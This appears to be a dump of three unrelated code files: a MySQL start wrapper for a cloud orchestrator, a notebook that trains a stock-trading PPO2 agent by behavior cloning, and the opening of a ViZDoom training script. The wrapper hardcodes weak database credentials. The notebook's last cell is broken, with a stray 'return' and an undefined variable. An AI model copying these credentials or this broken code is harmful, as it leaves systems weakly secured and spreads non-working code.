env_map['VOLUME_HOME'] = r'/mountedStorage'
env_map['PORT'] = r'3306'
env_map['DB_NAME'] = r'wordpress'
env_map['DB_USER'] = r'pass'
env_map['DB_PASSWORD'] = r'pass'
env_map['BIND_ADDRESS'] = r'true'
node_artifacts = {
"configs": [
{
"relative_path": "mysqld_charset.cnf",
"absolute_path": "_a4c_artifact/Mysql/configs/configs/mysqld_charset.cnf"
}
]
}
relationship_artifacts = {
}
artifacts = node_artifacts.copy()
artifacts.update(relationship_artifacts)
download_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'downloads')
env_map.update(download_artifacts(artifacts, download_dir))
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Mysql/tosca.interfaces.node.lifecycle.Standard/start/start_mysql.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.update()
|
Tensortrade_Behavior_Cloning.py
|
# To add a new cell, type '# %%'
# To add a new markdown cell, type '# %% [markdown]'
# %%
from IPython import get_ipython
# %% [markdown]
# # Install Stable-baselines/ TensorTrade - Colab
# %%
#install stable-baselines
get_ipython().system('sudo apt-get update && sudo apt-get install cmake libopenmpi-dev zlib1g-dev')
# setup dependencies
# !python3 -m pip install git+https://github.com/tensortrade-org/tensortrade.git
get_ipython().system('python3 -m pip install git+https://github.com/essamabas/tensortrade.git@live')
get_ipython().system('pip install yfinance ta matplotlib s3fs')
# %%
get_ipython().system('pip install stable-baselines[mpi]==2.10.1')
#select tensorflow version 1. -
get_ipython().run_line_magic('tensorflow_version', '1.x')
# %%
import stable_baselines
stable_baselines.__version__
# %% [markdown]
# # Include Libraries
# %%
# setup dependencies
import inspect
import sys
import os
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
#sys.path.insert(0, "{}".format(parentdir))
sys.path.append(parentdir)
currentdir
# %%
import pandas as pd
import tensortrade.env.default as default
from tensortrade.data.cdd import CryptoDataDownload
from tensortrade.feed.core import Stream, DataFeed
from tensortrade.oms.exchanges import Exchange
from tensortrade.oms.services.execution.simulated import execute_order
# Make a stream of closing prices to make orders on
from tensortrade.oms.instruments import USD, Instrument, Quantity
from tensortrade.oms.wallets import Wallet, Portfolio
from tensortrade.agents import DQNAgent
from tensortrade.env.default.renderers import PlotlyTradingChart, FileLogger, MatplotlibTradingChart
import gym
from stable_baselines.common.vec_env import DummyVecEnv, VecNormalize
from stable_baselines.common.policies import MlpPolicy, MlpLnLstmPolicy
from stable_baselines import DQN, PPO2, A2C
from stable_baselines.gail import generate_expert_traj
import ta
import numpy as np
from datetime import datetime
from scipy.signal import argrelextrema
import numpy as np
import yfinance as yf
from plotly.subplots import make_subplots
import plotly.graph_objects as go
# silence warnings
import warnings
warnings.filterwarnings('ignore')
get_ipython().run_line_magic('matplotlib', 'inline')
# Use these commands - to reload sources, while development
get_ipython().run_line_magic('load_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
# %% [markdown]
# # Helper Functions
# %%
def download_data(symbol: str,
start_date: str,
end_date: str = datetime.today().strftime('%Y-%m-%d'),
plot: bool = False) -> pd.DataFrame:
# download Data
df = yf.download(symbol, start=start_date, end=end_date)
df.reset_index(inplace=True)
df.columns = [name.lower() for name in df.columns]
df.drop(columns=["adj close","volume"],inplace=True)
df.set_index("date",inplace=True)
if plot:
df['close'].plot()
return df
## Apply Technical-Indicators (TA)
#- Check https://github.com/bukosabino/ta
#- TA- Visualization: https://github.com/bukosabino/ta/blob/master/examples_to_use/visualize_features.ipynb
def add_custom_ta_features(
df: pd.DataFrame,
open: str, # noqa
high: str,
low: str,
close: str,
fillna: bool = False,
colprefix: str = "",
apply_pct: bool = False,
plot: bool = False,
) -> pd.DataFrame:
# Add Volatility TA
df = ta.add_volatility_ta(
df=df, high=high, low=low, close=close, fillna=fillna, colprefix=colprefix
)
# Add Trend TA
df = ta.add_trend_ta(
df=df, high=high, low=low, close=close, fillna=fillna, colprefix=colprefix
)
# Add Other TA
df = ta.add_others_ta(df=df, close=close, fillna=fillna, colprefix=colprefix)
# convert to pct
if apply_pct:
df = df.pct_change(fill_method ='ffill')
df = df.applymap(lambda x: x*100)
df.replace([np.inf, -np.inf], np.nan,inplace=True)
df.astype(np.float32)
df = df.round(5)
if fillna:
df.fillna(value=0,inplace=True)
if plot:
fig = make_subplots(rows=5, cols=1,
shared_xaxes=True,
vertical_spacing=0.02,
subplot_titles=("Close", "Bollinger Bands","MACD"))
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=1, col=1)
# Bollinger-Bands
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=2, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['volatility_bbh'],
name = symbol+' High BB'
), row=2, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['volatility_bbl'],
name = symbol+' Low BB'
), row=2, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['volatility_bbm'],
name = symbol+' EMA BB'
), row=2, col=1)
# MACD
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_macd'],
name = symbol+' MACD'
), row=3, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_macd_signal'],
name = symbol+' MACD Signal'
), row=3, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_macd_diff'],
name = symbol+' MACD Difference'
), row=3, col=1)
# SMA
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=4, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_sma_fast'],
name = symbol+' SMA-Fast'
), row=4, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_sma_slow'],
name = symbol+' SMA-Slow'
), row=4, col=1)
# EMA
fig.add_trace(go.Scatter(
x=df.index,
y=df['close'],
name = symbol
), row=5, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_ema_fast'],
name = symbol+' EMA-Fast'
), row=5, col=1)
fig.add_trace(go.Scatter(
x=df.index,
y=df['trend_ema_slow'],
name = symbol+' EMA-Slow'
), row=5, col=1)
config = {'displayModeBar': False}
fig.show(config=config)
return df
def __classify(self, current_index,df_min,df_max):
'''
Apply Local/Min - Max analysis
'''
if current_index in df_min.index:
return 1 # buy-decision
elif current_index in df_max.index:
return -1 # sell-decision
else: # otherwise... it's a 0!
return 0 # hold-decision
def find_loc_min_max(data: pd.DataFrame,
order_of_points=7,
symbol: str = "symbol",
plot:bool = False):
'''
Find local peaks
'''
df_min_ts = data.iloc[argrelextrema(data.org_close.values, np.less_equal, order=order_of_points)[0]].astype(np.float32)
df_max_ts = data.iloc[argrelextrema(data.org_close.values, np.greater_equal, order=order_of_points)[0]].astype(np.float32)
df_min_ts = df_min_ts.iloc[:, 0:5]
df_max_ts = df_max_ts.iloc[:, 0:5]
if plot:
fig = go.Figure(data= go.Scatter(
x=data.index,
y=data['org_close'],
name = symbol
))
#fig = go.Figure([go.Scatter(x=df['Date'], y=df['AAPL.High'])])
fig.add_trace(go.Scatter(mode="markers", x=df_min_ts.index, y=df_min_ts['org_close'], name="min",marker_color='rgba(0, 255, 0, .9)'))
fig.add_trace(go.Scatter(mode="markers", x=df_max_ts.index, y=df_max_ts['org_close'], name="max",marker_color='rgba(255, 0, 0, .9)'))
config = {'displayModeBar': False}
fig.show(config=config)
return df_min_ts, df_max_ts
def create_trade_env(quotes, observations ,symbol):
# Add features
features = []
#exclude "date/Column [0]" from observation - start from column 1
for c in data.columns[0:]:
s = Stream.source(list(data[c]), dtype="float").rename(data[c].name)
features += [s]
feed = DataFeed(features)
feed.compile()
# define exchange - needs to specify Price-Quote Stream
exchange = Exchange("sim-exchange", service=execute_order)(
Stream.source(list(quotes["close"]), dtype="float").rename(str("USD-{}").format(symbol))
)
# add current cash, initial-asset
cash = Wallet(exchange, 10000 * USD)
asset = Wallet(exchange, 0 * Instrument(symbol, 2, symbol))
# initialize portfolio - base currency USD
portfolio = Portfolio(
base_instrument = USD,
wallets = [
cash,
asset
]
)
# add element for rendered feed
renderer_feed = DataFeed([
Stream.source(list(data.index)).rename("date"),
Stream.source(list(data["open"]), dtype="float").rename("open"),
Stream.source(list(data["high"]), dtype="float").rename("high"),
Stream.source(list(data["low"]), dtype="float").rename("low"),
Stream.source(list(data["close"]), dtype="float").rename("close")
#Stream.source(list(data["volume"]), dtype="float").rename("volume")
])
reward_scheme = default.rewards.SimpleProfit()
action_scheme = default.actions.SimpleOrders(trade_sizes=1)
'''
# define reward-scheme
# define action-scheme
action_scheme = default.actions.BSH(
cash=cash,
asset=asset
)
'''
# create env
env = default.create(
portfolio=portfolio,
action_scheme=action_scheme,
reward_scheme=reward_scheme,
feed=feed,
renderer_feed=renderer_feed,
#renderer="screen-log",
#window_size=20,
max_allowed_loss=0.6
)
return env
def evaluate_model(model, env, num_steps=1000):
"""
Evaluate a RL agent
:param model: (BaseRLModel object) the RL Agent
:param env: Trading-Env to be used
:param num_steps: (int) number of timesteps to evaluate it
:return: (float) Mean reward for the last 100 episodes
"""
episode_rewards = [0.0]
obs = env.reset()
done = False
while not done:
# _states are only useful when using LSTM policies
action, _states = model.predict(obs)
obs, reward, done, info = env.step(action)
# Stats
episode_rewards[-1] += reward
# Compute mean reward for the last 100 episodes
mean_100ep_reward = round(np.mean(episode_rewards[-100:]), 1)
print("Mean reward:", mean_100ep_reward, "Num episodes:", len(episode_rewards))
return mean_100ep_reward
# Here the expert is a random agent
# but it can be any python function, e.g. a PID controller
def expert_trader(_obs, debug_info:bool = False):
"""
Random agent. It samples actions randomly
from the action space of the environment.
:param _obs: (np.ndarray) Current observation
:return: (np.ndarray) action taken by the expert
"""
global df_min_ts
global df_max_ts
global global_last_action
global global_buy_counter
global global_sell_counter
if debug_info:
print("obs:=", _obs[0][0],_obs[0][1],_obs[0][2],_obs[0][3])
# use df_min_ts.iloc[:, 1] to access columns by indices to match observations arrays
is_buy_action = not (df_min_ts.loc[(df_min_ts.iloc[:, 0] == _obs[0][0]) &
(df_min_ts.iloc[:, 1] == _obs[0][1]) &
(df_min_ts.iloc[:, 2] == _obs[0][2]) &
(df_min_ts.iloc[:, 3] == _obs[0][3])
].empty)
is_sell_action = not (df_max_ts.loc[(df_max_ts.iloc[:, 0] == _obs[0][0]) &
(df_max_ts.iloc[:, 1] == _obs[0][1]) &
(df_max_ts.iloc[:, 2] == _obs[0][2]) &
(df_max_ts.iloc[:, 3] == _obs[0][3])
].empty)
if is_buy_action:
#perform buy action
global_last_action = 1
global_buy_counter += 1
if debug_info:
print("buy-action",global_buy_counter)
elif is_sell_action:
#perform sell action
global_last_action = 0
global_sell_counter += 1
if debug_info:
print("sell-action",global_sell_counter)
else:
#do nothing
pass
return global_last_action
# %% [markdown]
# ## Expert DataSet
# %%
# %%
import queue
import time
from multiprocessing import Queue, Process
import cv2 # pytype:disable=import-error
import numpy as np
from joblib import Parallel, delayed
from stable_baselines import logger
class ExpertDataset(object):
"""
Dataset for using behavior cloning or GAIL.
The structure of the expert dataset is a dict, saved as an ".npz" archive.
The dictionary contains the keys 'actions', 'episode_returns', 'rewards', 'obs' and 'episode_starts'.
The corresponding values have data concatenated across episode: the first axis is the timestep,
the remaining axes index into the data. In case of images, 'obs' contains the relative path to
the images, to enable space saving from image compression.
:param expert_path: (str) The path to trajectory data (.npz file). Mutually exclusive with traj_data.
:param traj_data: (dict) Trajectory data, in format described above. Mutually exclusive with expert_path.
:param train_fraction: (float) the train validation split (0 to 1)
for pre-training using behavior cloning (BC)
:param batch_size: (int) the minibatch size for behavior cloning
:param traj_limitation: (int) the number of trajectory to use (if -1, load all)
:param randomize: (bool) if the dataset should be shuffled
:param verbose: (int) Verbosity
:param sequential_preprocessing: (bool) Do not use subprocess to preprocess
the data (slower but use less memory for the CI)
"""
# Excluded attribute when pickling the object
EXCLUDED_KEYS = {'dataloader', 'train_loader', 'val_loader'}
def __init__(self, expert_path=None, traj_data=None, train_fraction=0.7, batch_size=64,
traj_limitation=-1, randomize=True, verbose=1, sequential_preprocessing=False):
if traj_data is not None and expert_path is not None:
raise ValueError("Cannot specify both 'traj_data' and 'expert_path'")
if traj_data is None and expert_path is None:
raise ValueError("Must specify one of 'traj_data' or 'expert_path'")
if traj_data is None:
traj_data = np.load(expert_path, allow_pickle=True)
if verbose > 0:
for key, val in traj_data.items():
print(key, val.shape)
# Array of bool where episode_starts[i] = True for each new episode
episode_starts = traj_data['episode_starts']
traj_limit_idx = len(traj_data['obs'])
if traj_limitation > 0:
n_episodes = 0
# Retrieve the index corresponding
# to the traj_limitation trajectory
for idx, episode_start in enumerate(episode_starts):
n_episodes += int(episode_start)
if n_episodes == (traj_limitation + 1):
traj_limit_idx = idx - 1
observations = traj_data['obs'][:traj_limit_idx]
actions = traj_data['actions'][:traj_limit_idx]
# obs, actions: shape (N * L, ) + S
# where N = # episodes, L = episode length
# and S is the environment observation/action space.
# S = (1, ) for discrete space
# Flatten to (N * L, prod(S))
if len(observations.shape) > 2:
#observations = np.reshape(observations, [-1, np.prod(observations.shape[1:])])
pass
if len(actions.shape) > 2:
#actions = np.reshape(actions, [-1, np.prod(actions.shape[1:])])
pass
indices = np.random.permutation(len(observations)).astype(np.int64)
# Train/Validation split when using behavior cloning
train_indices = indices[:int(train_fraction * len(indices))]
val_indices = indices[int(train_fraction * len(indices)):]
assert len(train_indices) > 0, "No sample for the training set"
assert len(val_indices) > 0, "No sample for the validation set"
self.observations = observations
self.actions = actions
self.returns = traj_data['episode_returns'][:traj_limit_idx]
self.avg_ret = sum(self.returns) / len(self.returns)
self.std_ret = np.std(np.array(self.returns))
self.verbose = verbose
assert len(self.observations) == len(self.actions), "The number of actions and observations differ " "please check your expert dataset"
self.num_traj = min(traj_limitation, np.sum(episode_starts))
self.num_transition = len(self.observations)
self.randomize = randomize
self.sequential_preprocessing = sequential_preprocessing
self.dataloader = None
self.train_loader = DataLoader(train_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
self.val_loader = DataLoader(val_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
if self.verbose >= 1:
self.log_info()
def init_dataloader(self, batch_size):
"""
Initialize the dataloader used by GAIL.
:param batch_size: (int)
"""
indices = np.random.permutation(len(self.observations)).astype(np.int64)
self.dataloader = DataLoader(indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=self.sequential_preprocessing)
def __del__(self):
# Exit processes if needed
for key in self.EXCLUDED_KEYS:
if self.__dict__.get(key) is not None:
del self.__dict__[key]
def __getstate__(self):
"""
Gets state for pickling.
Excludes processes that are not pickleable
"""
# Remove processes in order to pickle the dataset.
return {key: val for key, val in self.__dict__.items() if key not in self.EXCLUDED_KEYS}
def __setstate__(self, state):
"""
Restores pickled state.
init_dataloader() must be called
after unpickling before using it with GAIL.
:param state: (dict)
"""
self.__dict__.update(state)
for excluded_key in self.EXCLUDED_KEYS:
assert excluded_key not in state
self.dataloader = None
self.train_loader = None
self.val_loader = None
def log_info(self):
"""
Log the information of the dataset.
"""
logger.log("Total trajectories: {}".format(self.num_traj))
logger.log("Total transitions: {}".format(self.num_transition))
logger.log("Average returns: {}".format(self.avg_ret))
logger.log("Std for returns: {}".format(self.std_ret))
def get_next_batch(self, split=None):
"""
Get the batch from the dataset.
:param split: (str) the type of data split (can be None, 'train', 'val')
:return: (np.ndarray, np.ndarray) inputs and labels
"""
dataloader = {
None: self.dataloader,
'train': self.train_loader,
'val': self.val_loader
}[split]
if dataloader.process is None:
dataloader.start_process()
try:
return next(dataloader)
except StopIteration:
dataloader = iter(dataloader)
return next(dataloader)
def plot(self):
"""
Show histogram plotting of the episode returns
"""
# Isolate dependency since it is only used for plotting and also since
# different matplotlib backends have further dependencies themselves.
import matplotlib.pyplot as plt
plt.hist(self.returns)
plt.show()
class DataLoader(object):
"""
A custom dataloader to preprocessing observations (including images)
and feed them to the network.
Original code for the dataloader from https://github.com/araffin/robotics-rl-srl
(MIT licence)
Authors: Antonin Raffin, René Traoré, Ashley Hill
:param indices: ([int]) list of observations indices
:param observations: (np.ndarray) observations or images path
:param actions: (np.ndarray) actions
:param batch_size: (int) Number of samples per minibatch
:param n_workers: (int) number of preprocessing worker (for loading the images)
:param infinite_loop: (bool) whether to have an iterator that can be reset
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param shuffle: (bool) Shuffle the minibatch after each epoch
:param start_process: (bool) Start the preprocessing process (default: True)
:param backend: (str) joblib backend (one of 'multiprocessing', 'sequential', 'threading'
or 'loky' in newest versions)
:param sequential: (bool) Do not use subprocess to preprocess the data
(slower but use less memory for the CI)
:param partial_minibatch: (bool) Allow partial minibatches (minibatches with a number of element
lesser than the batch_size)
"""
def __init__(self, indices, observations, actions, batch_size, n_workers=1,
infinite_loop=True, max_queue_len=1, shuffle=False,
start_process=True, backend='threading', sequential=False, partial_minibatch=True):
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.indices = indices
self.original_indices = indices.copy()
self.n_minibatches = len(indices) // batch_size
# Add a partial minibatch, for instance
# when there is not enough samples
if partial_minibatch and len(indices) % batch_size > 0:
self.n_minibatches += 1
self.batch_size = batch_size
self.observations = observations
self.actions = actions
self.shuffle = shuffle
self.queue = Queue(max_queue_len)
self.process = None
self.load_images = isinstance(observations[0], str)
self.backend = backend
self.sequential = sequential
self.start_idx = 0
if start_process:
self.start_process()
def start_process(self):
"""Start preprocessing process"""
# Skip if in sequential mode
if self.sequential:
return
self.process = Process(target=self._run)
# Make it a deamon, so it will be deleted at the same time
# of the main process
self.process.daemon = True
self.process.start()
@property
def _minibatch_indices(self):
"""
Current minibatch indices given the current pointer
(start_idx) and the minibatch size
:return: (np.ndarray) 1D array of indices
"""
return self.indices[self.start_idx:self.start_idx + self.batch_size]
def sequential_next(self):
"""
Sequential version of the pre-processing.
"""
if self.start_idx > len(self.indices):
raise StopIteration
if self.start_idx == 0:
if self.shuffle:
# Shuffle indices
np.random.shuffle(self.indices)
obs = self.observations[self._minibatch_indices]
if self.load_images:
obs = np.concatenate([self._make_batch_element(image_path) for image_path in obs],
axis=0)
actions = self.actions[self._minibatch_indices]
self.start_idx += self.batch_size
return obs, actions
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend=self.backend) as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
np.random.shuffle(self.indices)
for minibatch_idx in range(self.n_minibatches):
self.start_idx = minibatch_idx * self.batch_size
obs = self.observations[self._minibatch_indices]
if self.load_images:
if self.n_workers <= 1:
obs = [self._make_batch_element(image_path)
for image_path in obs]
else:
obs = parallel(delayed(self._make_batch_element)(image_path)
for image_path in obs)
obs = np.concatenate(obs, axis=0)
actions = self.actions[self._minibatch_indices]
self.queue.put((obs, actions))
# Free memory
del obs
self.queue.put(None)
@classmethod
def _make_batch_element(cls, image_path):
"""
Process one element.
:param image_path: (str) path to an image
:return: (np.ndarray)
"""
# cv2.IMREAD_UNCHANGED is needed to load
# grey and RGBa images
image = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
# Grey image
if len(image.shape) == 2:
image = image[:, :, np.newaxis]
if image is None:
raise ValueError("Tried to load {}, but it was not found".format(image_path))
# Convert from BGR to RGB
if image.shape[-1] == 3:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image.reshape((1,) + image.shape)
return image
def __len__(self):
return self.n_minibatches
def __iter__(self):
self.start_idx = 0
self.indices = self.original_indices.copy()
return self
def __next__(self):
if self.sequential:
return self.sequential_next()
if self.process is None:
raise ValueError("You must call .start_process() before using the dataloader")
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
def __del__(self):
if self.process is not None:
self.process.terminate()
# %% [markdown]
# # Trading Data
# %%
symbol = 'AAPL'
exchange = 'NASDAQ'
start_date = '2010-01-01'
end_date = '2020-12-11'
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date, plot=True)
quotes.head()
# %% [markdown]
# ## Apply Technical-Indicators (TA)
# - Check https://github.com/bukosabino/ta
# - TA- Visualization: https://github.com/bukosabino/ta/blob/master/examples_to_use/visualize_features.ipynb
# %%
# get ta-indicators
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True,plot=True,apply_pct=False)
data.tail()
# %% [markdown]
# ## Get Local Minima/Maxima
#
# %%
# get Min/Max TimeStamps
tmp_data = data.iloc[:,0:4]
tmp_data['org_close'] = quotes['close']
df_min_ts, df_max_ts = find_loc_min_max(data=tmp_data,order_of_points=7, plot=True)
df_min_ts.head()
# %% [markdown]
# # Create Trading-Enviornment
# %%
env = create_trade_env(quotes, data,symbol)
# %%
env.observer.feed.next()
# %% [markdown]
# # Train RL-Agent using Expert-Records
# %%
# PPO2-Model
from stable_baselines.common.policies import MlpPolicy, MlpLnLstmPolicy
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
agent = PPO2(MlpPolicy, env=VecEnv, verbose=1,tensorboard_log=os.path.join(currentdir,"logs"))
# Pretrain the PPO2 model
#agent.pretrain(dataset, n_epochs=1000)
# As an option, you can train the RL agent
agent.learn(int(1e5),tb_log_name="learn_"+symbol)
agent.save(save_path=os.path.join(currentdir, "BC_PPO2_MlpPolicy_NORM.zip"))
# %%
# Load the TensorBoard notebook extension
get_ipython().run_line_magic('load_ext', 'tensorboard')
get_ipython().run_line_magic('tensorboard', '--logdir logs/')
#tensorboard = TensorBoard(log_dir="./logs")
# %% [markdown]
# ## Evaluate Model
# %%
symbol = 'AACQU'
start_date = '2010-01-01'
end_date = '2020-12-11'
#MSFT, TSLA, AAPL,NFLX,GOOG, GLD
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date,plot=True)
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True)
#df_min_ts, df_max_ts = find_loc_min_max(data=quotes,order_of_points=7, plot=True)
env = create_trade_env(quotes, data,symbol)
# %%
# %%
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
agent = PPO2.load(load_path=os.path.join(currentdir, "BC_PPO2_MlpPolicy_NORM.zip"))
#agent = DQN.load(load_path=os.path.join(currentdir, "agents","DQN_MlpPolicy_02.zip"), env=env)
evaluate_model(agent, env)
# %%
#portfolio.performance.net_worth.plot()
performance = pd.DataFrame.from_dict(env.action_scheme.portfolio.performance, orient='index')
performance['net_worth'].plot()
# %%
performance['net_worth'].tail()
# %% [markdown]
# # Load Financial Symbols
# %%
get_ipython().system('pip install finsymbols')
# %%
from finsymbols import symbols
import json
import pprint
#symbol_list = symbols.get_sp500_symbols()
#symbol_list.extend(symbols.get_amex_symbols())
#symbol_list.extend(symbols.get_nyse_symbols())
#symbol_list.extend(symbols.get_nasdaq_symbols())
symbol_list = symbols.get_nasdaq_symbols()
column_names = ['company','headquarters', 'industry','sector','symbol']
df = pd.DataFrame(symbol_list, columns=column_names)
my_symbols = df['symbol'].replace("\n", "", regex=True)
# %% [markdown]
# # Loops
# %% [markdown]
# ## Create expert Recordings
# %%
# Download List of NASDAQ Insturment
df = pd.read_csv('nasdaq_list.csv')
#df = df.iloc[17:]
df.head()
# %%
start_date = '2010-01-01'
end_date = '2020-12-11'
for symbol in df['Symbol']:
#MSFT, TSLA, AAPL,NFLX,GOOG, GLD
print("symbol:=", symbol)
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date,plot=True)
if (not quotes.empty) and (len(quotes)>100):
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True)
# get Min/Max TimeStamps
tmp_data = data.iloc[:,0:4]
tmp_data['org_close'] = quotes['close']
df_min_ts, df_max_ts = find_loc_min_max(data=tmp_data,order_of_points=7, plot=True, symbol=symbol)
env = create_trade_env(quotes, data,symbol)
global_buy_counter = 0
global_sell_counter = 0
global_last_action = 0
try:
generate_expert_traj(expert_trader, 'expert_trader_'+symbol, env, n_episodes=10)
except:
print("An exception occurred while generating recording for symbol:=",symbol)
# %% [markdown]
# ## Trainning Loop
# %%
current = os.getcwd()
model_path = os.path.join(currentdir, "LOOP_PPO2_MlpPolicy_NORM.zip")
for filename in os.listdir(current):
#extract pretrain file
if filename.endswith(".npz"):
# get symbol-name
x = filename.split("expert_trader_")
x= x[1].split(".npz")
symbol=x[0]
f = open('traing_progress.txt', 'a')
f.write("pre-train: " + symbol)
f.close()
# create env
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date,plot=True)
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True)
env = create_trade_env(quotes, data,symbol)
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
if os.path.isfile(model_path):
#load agent
agent = PPO2.load(load_path=model_path, env=VecEnv,tensorboard_log=os.path.join(currentdir,"logs"))
print("Agent has been loaded: Symbol= ", symbol)
else:
#create new agent
agent = PPO2(policy=MlpPolicy, env=VecEnv, verbose=1,tensorboard_log=os.path.join(currentdir,"logs"))
print("new Agent has been created: Symbol= ", symbol)
# Pretrain the PPO2 model
dataset = ExpertDataset(expert_path='expert_trader_'+ symbol +'.npz',
traj_limitation=10, batch_size=64, randomize = False)
agent.pretrain(dataset, n_epochs=100)
# As an option, you can train the RL agent
agent.learn(int(1e4),tb_log_name="learn_"+symbol)
#save Model
agent.save(save_path=model_path)
print("Agent has been Saved: Symbol= ", symbol)
print("--------------------------------------------------")
else:
continue
# %%
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
#agent = DQN.load(load_path=os.path.join(currentdir, "agents","DQN_MlpPolicy_02.zip"), env=env)
evaluate_model(agent, env)
# %%
agent = PPO2.load(load_path=os.path.join(currentdir, "BC_PPO2_MlpPolicy_NORM.zip"))
# Pretrain the PPO2 model
agent.pretrain(dataset, n_epochs=1000)
# As an option, you can train the RL agent
agent.learn(int(1e5),tb_log_name="learn_"+symbol)
# %% [markdown]
# # Evaulate using Pyfolio
# %%
rets = px[['AdjClose']]
rets = rets.shift(-1)
rets.iloc[-1]['AdjClose'] = px.tail(1)['AdjOpen']
rets = rets.shift(1) / rets - 1
rets = rets.dropna()
rets.index = rets.index.to_datetime()
rets.index = rets.index.tz_localize("UTC")
rets.columns = [symbol]
return rets
|
doom.py
|
import threading
import multiprocessing
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.contrib.slim as slim
import scipy.signal
from helper import *
from vizdoom import *
from random import choice
from time import sleep
from time import time
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target_graph(from_scope,to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var,to_var in zip(from_vars,to_vars):
